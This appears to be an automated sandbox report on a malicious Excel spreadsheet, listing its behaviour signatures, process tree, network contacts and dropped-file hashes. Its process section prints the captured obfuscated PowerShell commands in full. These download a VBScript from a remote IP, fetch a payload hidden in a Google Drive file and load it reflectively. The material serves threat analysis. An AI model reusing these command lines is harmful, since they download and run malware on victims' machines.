Malware Analysis Report

2025-08-05 11:48

Sample ID 241031-egx25s1kdr
Target d4571d781718a7871ea17ac8e91e17623319b921de2c9fb3a369f466cfde8683.xls
SHA256 d4571d781718a7871ea17ac8e91e17623319b921de2c9fb3a369f466cfde8683
Tags
defense_evasion discovery execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

d4571d781718a7871ea17ac8e91e17623319b921de2c9fb3a369f466cfde8683

Threat Level: Known bad

The file d4571d781718a7871ea17ac8e91e17623319b921de2c9fb3a369f466cfde8683.xls was found to be: Known bad.

Malicious Activity Summary

defense_evasion discovery execution

Process spawned unexpected child process

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Evasion via Device Credential Deployment

Legitimate hosting services abused for malware hosting/C2

Drops file in System32 directory

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Uses Volume Shadow Copy service COM API

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Checks processor information in registry

Suspicious behavior: AddClipboardFormatListener

Enumerates system info in registry

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Uses Volume Shadow Copy WMI provider

Uses Task Scheduler COM API

Modifies Internet Explorer settings

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-31 03:55

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-31 03:55

Reported

2024-10-31 03:58

Platform

win7-20240903-en

Max time kernel

121s

Max time network

124s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\d4571d781718a7871ea17ac8e91e17623319b921de2c9fb3a369f466cfde8683.xls

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Evasion via Device Credential Deployment

defense_evasion execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\wiNdoWSpoWersHelL\v1.0\poWerSHelL.EXe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\wiNdoWSpoWersHelL\v1.0\poWerSHelL.EXe N/A
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wiNdoWSpoWersHelL\v1.0\poWerSHelL.EXe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\wiNdoWSpoWersHelL\v1.0\poWerSHelL.EXe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2656 wrote to memory of 2632 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\wiNdoWSpoWersHelL\v1.0\poWerSHelL.EXe
PID 2656 wrote to memory of 2632 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\wiNdoWSpoWersHelL\v1.0\poWerSHelL.EXe
PID 2656 wrote to memory of 2632 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\wiNdoWSpoWersHelL\v1.0\poWerSHelL.EXe
PID 2656 wrote to memory of 2632 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\wiNdoWSpoWersHelL\v1.0\poWerSHelL.EXe
PID 2632 wrote to memory of 1924 N/A C:\Windows\SysWOW64\wiNdoWSpoWersHelL\v1.0\poWerSHelL.EXe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2632 wrote to memory of 1924 N/A C:\Windows\SysWOW64\wiNdoWSpoWersHelL\v1.0\poWerSHelL.EXe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2632 wrote to memory of 1924 N/A C:\Windows\SysWOW64\wiNdoWSpoWersHelL\v1.0\poWerSHelL.EXe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2632 wrote to memory of 1924 N/A C:\Windows\SysWOW64\wiNdoWSpoWersHelL\v1.0\poWerSHelL.EXe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2632 wrote to memory of 2032 N/A C:\Windows\SysWOW64\wiNdoWSpoWersHelL\v1.0\poWerSHelL.EXe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2632 wrote to memory of 2032 N/A C:\Windows\SysWOW64\wiNdoWSpoWersHelL\v1.0\poWerSHelL.EXe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2632 wrote to memory of 2032 N/A C:\Windows\SysWOW64\wiNdoWSpoWersHelL\v1.0\poWerSHelL.EXe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2632 wrote to memory of 2032 N/A C:\Windows\SysWOW64\wiNdoWSpoWersHelL\v1.0\poWerSHelL.EXe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2032 wrote to memory of 2000 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2032 wrote to memory of 2000 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2032 wrote to memory of 2000 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2032 wrote to memory of 2000 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2632 wrote to memory of 1512 N/A C:\Windows\SysWOW64\wiNdoWSpoWersHelL\v1.0\poWerSHelL.EXe C:\Windows\SysWOW64\WScript.exe
PID 2632 wrote to memory of 1512 N/A C:\Windows\SysWOW64\wiNdoWSpoWersHelL\v1.0\poWerSHelL.EXe C:\Windows\SysWOW64\WScript.exe
PID 2632 wrote to memory of 1512 N/A C:\Windows\SysWOW64\wiNdoWSpoWersHelL\v1.0\poWerSHelL.EXe C:\Windows\SysWOW64\WScript.exe
PID 2632 wrote to memory of 1512 N/A C:\Windows\SysWOW64\wiNdoWSpoWersHelL\v1.0\poWerSHelL.EXe C:\Windows\SysWOW64\WScript.exe
PID 1512 wrote to memory of 2860 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1512 wrote to memory of 2860 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1512 wrote to memory of 2860 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1512 wrote to memory of 2860 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2860 wrote to memory of 2144 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2860 wrote to memory of 2144 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2860 wrote to memory of 2144 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2860 wrote to memory of 2144 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\d4571d781718a7871ea17ac8e91e17623319b921de2c9fb3a369f466cfde8683.xls

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe -Embedding

C:\Windows\SysWOW64\wiNdoWSpoWersHelL\v1.0\poWerSHelL.EXe

"C:\Windows\sYstEM32\wiNdoWSpoWersHelL\v1.0\poWerSHelL.EXe" "PowErsHELl.Exe -eX BypASS -nOp -w 1 -c DevIcecREDENtIALdEpLOymENt ; iEx($(ieX('[SyStem.tEXT.ENCODInG]'+[cHar]0x3a+[CHAr]0X3a+'UTf8.GetsTRIng([SYStEM.ConVert]'+[CHAR]0x3a+[cHAR]58+'fromBase64striNG('+[char]0x22+'JFE3MiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1CRVJkRUZpbklUaU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRXRMSmtpSyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnQUFrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdwbnJUUSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRUJXbHJNcyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1SEFyY1hhTHpqKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaXF3bnhudHV1RWUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBiZE93eGdSR1lCICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRNzI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjE1MS82Ni9zZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnb29kZm9ybWV3aXRoLnRJRiIsIiRFblY6QVBQREFUQVxzZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnb29kZm9ybWUudmJzIiwwLDApO3NUYVJ0LVNsRUVQKDMpO1N0YVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnb29kZm9ybWUudmJzIg=='+[CHar]0X22+'))')))"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX BypASS -nOp -w 1 -c DevIcecREDENtIALdEpLOymENt

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\demda8pj.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF143.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCF142.tmp"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seemethebestthingswithgreatneedswithgoodforme.vbs"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRTSEVMbGlkWzFdKyRzaEVsbElkWzEzXSsnWCcpICgoJ2p2TWltYWdlVXJsID0gdUNiaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgdUNiO2p2TXdlYkNsaWVudCA9IE5ldy1PYmplYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7anZNaW1hZ2VCJysneXRlJysncyA9IGp2TXdlYkNsaWVudC5Eb3dubG9hZERhJysndGEoanZNaW1hZ2VVcmwpO2p2TWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKGp2TWltYWdlQnl0ZXMpO2p2TXN0YXJ0RmxhZyA9IHVDYjw8QkFTRTY0X1NUQVJUPj51Q2I7anZNZW5kJysnRmxhZyA9IHVDYjw8QkFTRTY0X0VORD4+dUNiO2p2TXN0YXJ0SW5kZXggPSBqdk1pbWFnZVRleHQuSW5kZXhPZihqdk1zdGFydEZsYWcpO2p2TWVuZEluZGV4ID0ganZNaW1hZ2VUZXh0JysnLkluZGV4T2YnKycoanZNZW5kRmxhZyk7anZNc3RhcnRJbmRleCAtZ2UgMCAtYW5kIGp2TWVuZEluZGV4IC1ndCBqdk1zdGFydEluZGV4O2p2TXN0YXJ0SW5kZXggKz0ganZNc3RhcnRGbGFnLkxlbmd0aDtqdk1iYXNlNjRMZW5ndGggPSBqdk1lbmRJJysnbmRleCAtIGp2TXN0YXJ0SW5kZScrJ3g7anZNYmFzZTY0Q29tbWFuZCA9IGp2TWltYWdlVGV4dC5TdWJzdHJpbmcoanZNc3RhcnRJbmRleCwganZNYmFzZTY0TGVuZ3RoKTtqdk0nKydiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChqdk1iYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgbnJFIEZvckVhJysnY2gtT2JqZWN0IHsganZNXyB9KVstMS4uLShqdk1iYXNlNjRDb21tYW5kLkxlbmd0aCldO2p2TWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoanZNYmFzZTY0UmV2ZXJzZWQpO2p2TWxvYWRlZEFzc2VtYmx5ICcrJz0gW1N5Jysnc3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChqdk1jb21tYW5kQnl0ZXMpO2p2TXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXScrJy5HZXRNZXRob2QnKycodUNiVkFJdUNiKTtqdk12YWlNZXRob2QuSW52b2tlKGp2TW51bGwsIEAodUNidHh0LicrJ0dST0wnKydMLzY2LzE1MS44NzEuNjQuODkxLycrJy86cHR0aHVDJysnYiwgdUNiZGVzYXRpdmFkb3VDYiwgdUNiZGVzYScrJ3RpdmFkb3VDYiwgdUNiZGVzYXRpdmFkb3VDYicrJywgdUNiYXNwbicrJ2UnKyd0X3JlZ2Jyb3dzZXJzdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYXRpdmFkb3VDYix1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYScrJ3RpdmFkb3VDYix1Q2IxdUNiLHVDYmRlc2F0aXZhZG91Q2IpKTsnKS5SZXBsQWNlKCdqdk0nLCckJykuUmVwbEFjZSgndUNiJyxbc1RyaW5HXVtjaGFSXTM5KS5SZXBsQWNlKChbY2hhUl0xMTArW2NoYVJdMTE0K1tjaGFSXTY5KSxbc1RyaW5HXVtjaGFSXTEyNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $SHELlid[1]+$shEllId[13]+'X') (('jvMimageUrl = uCbhttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur uCb;jvMwebClient = New-Objec'+'t System.Net.WebClient;jvMimageB'+'yte'+'s = jvMwebClient.DownloadDa'+'ta(jvMimageUrl);jvMimageText = [System.Text.Encoding]::UTF8.GetString(jvMimageBytes);jvMstartFlag = uCb<<BASE64_START>>uCb;jvMend'+'Flag = uCb<<BASE64_END>>uCb;jvMstartIndex = jvMimageText.IndexOf(jvMstartFlag);jvMendIndex = jvMimageText'+'.IndexOf'+'(jvMendFlag);jvMstartIndex -ge 0 -and jvMendIndex -gt jvMstartIndex;jvMstartIndex += jvMstartFlag.Length;jvMbase64Length = jvMendI'+'ndex - jvMstartInde'+'x;jvMbase64Command = jvMimageText.Substring(jvMstartIndex, jvMbase64Length);jvM'+'base64Reversed = -join (jvMbase64Command.ToCharArray('+') nrE ForEa'+'ch-Object { jvM_ })[-1..-(jvMbase64Command.Length)];jvMcommandBytes = [System.Convert]::FromBase64String(jvMbase64Reversed);jvMloadedAssembly '+'= [Sy'+'stem.Reflection.Assembly]::Load(jvMcommandBytes);jvMvaiMethod = [dnlib.IO.Home]'+'.GetMethod'+'(uCbVAIuCb);jvMvaiMethod.Invoke(jvMnull, @(uCbtxt.'+'GROL'+'L/66/151.871.64.891/'+'/:ptthuC'+'b, uCbdesativadouCb, uCbdesa'+'tivadouCb, uCbdesativadouCb'+', uCbaspn'+'e'+'t_regbrowsersuCb, uCbdesativadouCb, uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesa'+'tivadouCb,uCb1uCb,uCbdesativadouCb));').ReplAce('jvM','$').ReplAce('uCb',[sTrinG][chaR]39).ReplAce(([chaR]110+[chaR]114+[chaR]69),[sTrinG][chaR]124))"

Network

Country Destination Domain Proto
US 8.8.8.8:53 acesso.run udp
US 172.67.162.95:443 acesso.run tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.180.3:80 c.pki.goog tcp
US 198.46.178.151:80 198.46.178.151 tcp
US 172.67.162.95:443 acesso.run tcp
US 198.46.178.151:80 198.46.178.151 tcp
US 198.46.178.151:80 198.46.178.151 tcp
US 8.8.8.8:53 drive.google.com udp
GB 142.250.179.238:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 142.250.187.193:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.18.190.73:80 crl.microsoft.com tcp

Files

memory/2592-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2592-1-0x00000000735DD000-0x00000000735E8000-memory.dmp

memory/2656-16-0x00000000028B0000-0x00000000028B2000-memory.dmp

memory/2592-17-0x00000000023A0000-0x00000000023A2000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

MD5 d10a7724448dde511afcf5a13455e981
SHA1 4c0858aff547a751f03fbbf6a1fe5d9bfd865bdd
SHA256 1af10890bce6b27024db9c4b7afdfb33a5f312dc6377373bc3672cb53cb75815
SHA512 7287d2265768b519e8a9c8258b3dac12872a5ac30219a2cb137ea9967d5f743612193d8d3dd2f0c2dbfc5f5483603a98bc7cf044857a4b021277167616891d57

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

MD5 971c514f84bba0785f80aa1c23edfd79
SHA1 732acea710a87530c6b08ecdf32a110d254a54c8
SHA256 f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895
SHA512 43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

MD5 67e486b2f148a3fca863728242b6273e
SHA1 452a84c183d7ea5b7c015b597e94af8eef66d44a
SHA256 facaf1c3a4bf232abce19a2d534e495b0d3adc7dbe3797d336249aa6f70adcfb
SHA512 d3a37da3bb10a9736dc03e8b2b49baceef5d73c026e2077b8ebc1b786f2c9b2f807e0aa13a5866cf3b3cafd2bc506242ef139c423eaffb050bbb87773e53881e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

MD5 b656eb690e507b48afe27d22348590ca
SHA1 19341ab402e1354fcd5199fee416b90439ed5cc7
SHA256 e8db6054700bf376d18b607df6290c46f26e347ed06c34cfb9c773b401af8934
SHA512 df2137877452593fd72f4d9659afaf73543b54de23667bd7d6a148995235b78d09fba8c324a1345df75f43c493c2a303ce610be8ee69d05b16eac12ee89dc85e

C:\Users\Admin\AppData\Local\Temp\CabE927.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\633SXO0D\greatthingswithmegoods[1].hta

MD5 451b13bf86fbe3a42c6b4623f1c25c1f
SHA1 555c0cc1a4b1e614134ef7f14f13754196122e7a
SHA256 6da79167c18f55267666b891654827fc3fdddc9c136ffbc3380d1aa645a96010
SHA512 37b14103fa34f85045adde0266cda27e4535525996e797ced744a97b6b1b1699931b8537040d4c303e217fa54f2337ad613500aa5c52f03b115d5ecb769e2577

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 9595c68ba284f280ed3cffaf5e9d945c
SHA1 8ab4b2a3cb0222395e527ab49da2f2977aeb510d
SHA256 9f5790c091d2a4b9635e09c517d12741aa7a54c6bd2f5cac180c04033bc59449
SHA512 aebde8c909f6c94c7c9fb68bcc816de8cfb63dc5fbcd0fc173716319527872b7bfb2122effa6e9f33ba92fdd2068fe1058607c51fc689d4d221d070e4ce9b393

\??\c:\Users\Admin\AppData\Local\Temp\demda8pj.cmdline

MD5 667a7033e563ca9a5aaf913ed13cb355
SHA1 f886dbbafed4d68a53645eb0a86be1af87a5d5d8
SHA256 a2031765d4f16bfdfb6638be997a504e5d164d11d2e5f644961c5fa33c804f54
SHA512 2eb50c5ea7e820ab851daa8b6c623a76c2e9ec69af71045c4906bf88a45fa27cc284d04cb8eba2f865660d292bce7ff7988a83afd32d31c2b7c7d1471deabd61

\??\c:\Users\Admin\AppData\Local\Temp\demda8pj.0.cs

MD5 73e437abcfe1b954153b49afe9bfb390
SHA1 ce780d4b157041335670d45398cfd12dfd8941a0
SHA256 8204745749c8952be4809c5aa5caf56693bc3edbbcbb578c6bcdd026ecf26d74
SHA512 1247cb671caa6e622f674eac37b696cc38756d079d79f89df49a7104fe839ec8a3b4956091f9422de7c723ae0e63c0f4d078ae06444d9ea04b2e0491a5fd47d7

\??\c:\Users\Admin\AppData\Local\Temp\CSCF142.tmp

MD5 480f2b4167dbae3c002f4fab0334d716
SHA1 22cf9664db202aa544a4b51d8fd705ace2e3870d
SHA256 424187b4a48c04b9eb10e05eea59b37edeb41b2d6db689a4abd2394943b5cdcc
SHA512 f4c71f1ae23744e8b34aa3417898dc0d7bbdf2ea3cddfbd7efc36c9619f5800448650479138471fb62fe5bb558a62e1a3ebd51922c2bbc4c62d1d46f42f131f2

C:\Users\Admin\AppData\Local\Temp\RESF143.tmp

MD5 0c877dbb498dff22c4682a78762466e2
SHA1 f3833bec54fad9a881d4b611d2d2a02cf0c58a2a
SHA256 ca9b311198bf43f5306a697482bab4634743c5dc818ba57be2b0922d65ba2cce
SHA512 cb01428e24f0cf63a9f5a9391978425eb2d24f8a90873b1e8e7de286adaaf1d2fc59e98d4f0bac579fbf54d54eba651a89273a8b91d2e0d612a884956bb3ecf7

C:\Users\Admin\AppData\Local\Temp\demda8pj.dll

MD5 7e08cf593a0e19ce894df3b86d97b169
SHA1 0aabee0d72c81bbc0698b23ca1b68720366dd905
SHA256 9cd7769ad1951138f9fd3c163bc1f8689176b0e47235eab1844ae995ff19f759
SHA512 0959da85e1f2e3d8d4a0cc57c250732911648f0dad2f508803f6f2908a160e02dfb637617f097c7760139b7b23987cb8ce5c783d960b681d3219ef928ae4259c

C:\Users\Admin\AppData\Local\Temp\demda8pj.pdb

MD5 d6ec5115b09b7c7cb557411cc953ccfe
SHA1 8581401f87404bae1b491c43ec520fb42e10d3e4
SHA256 8796dd83584f56b40bd9c4f95e1ca19d98e1d9bdf8fe56ff389d9f987786e00b
SHA512 4af1bad0b33eff0cb10cbd06df1c78d433bc8e0156fdccf9ca7270581eb60aaf6079e96d5036f0b7243be9e289f3ffbde3c724b4c699f1b3e535440ca972fd2a

memory/2592-60-0x00000000735DD000-0x00000000735E8000-memory.dmp

C:\Users\Admin\AppData\Roaming\seemethebestthingswithgreatneedswithgoodforme.vbs

MD5 64cc9748329c0e186cacd10d639615e6
SHA1 1291f245b185bd05fb09646b79f284d76e7dc0ff
SHA256 2c5fffa8231f572e3a34b8d4ca675aec062c3accfe661519a28e376605c0479d
SHA512 65ccbfe0223b58675aef7de997229f3ba66be892c851d6cec9018b941f3a5c5cac3c41fbe1878474213293ad25059b06e7ff7f0c4e3320d75a6fa7f071b646ba

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
